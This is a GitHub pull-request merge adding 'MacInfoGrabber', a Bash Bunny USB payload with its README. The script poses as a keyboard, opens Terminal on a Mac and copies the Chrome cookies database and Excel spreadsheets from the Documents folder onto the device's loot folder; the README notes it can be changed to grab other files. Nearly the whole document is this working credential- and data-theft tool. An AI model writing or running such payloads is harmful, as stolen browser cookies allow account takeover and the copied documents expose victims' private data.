Merge pull request #27 from bobmcdouble3/master

Added the MacInfoGrabber payload
pull/37/head
Sebastian Kinne 2017-03-10 09:37:09 +11:00 committed by GitHub
commit a70d651e00
2 changed files with 69 additions and 0 deletions

View File

@ -0,0 +1,49 @@
#!/bin/bash
#
# Title: Mac Info Grabber
# Author: kmakblob
# Version: 1.1
#
# Steaks cookies from chrome and documents from the documents folder (spreadsheets)
# then stashes them in /root/udisk/loot/MacLoot
#
# Red................Failed to get spreadsheets
# Purple.............Got some spreadsheets
# Green..............Finished
#
LED R
ATTACKMODE HID STORAGE
LOOTDIR=/root/udisk/loot/MacLoot
mkdir -p $LOOTDIR
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 8000
QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/xlsx
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/$LOOTDIR/xlsx/
QUACK ENTER
QUACK DELAY 1000
QUACK GUI q
QUACK DELAY 500
QUACK ENTER
# Green LED for finished
LED G
files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l)
if [ "$files" != "0" -o "$files2" != "0"]
then
# Got spreadsheet files
LED R B
else
LED R
# No spread sheets
fi

View File

@ -0,0 +1,20 @@
# Mac Info Grabber for the BashBunny
* Author: kmakblob
* Version: Version 1.0
* Target: OSX
## Description
A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
the Documents folder and places them inside a folder on the BashBunny called MacLoot.
This payload can be easily modified to grab other files like word docs or csv files.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Green | Attack Finished |
| Purple | Successfully grabbed xls or xlsx files |
| RED | Did not get any xls or xlsx files |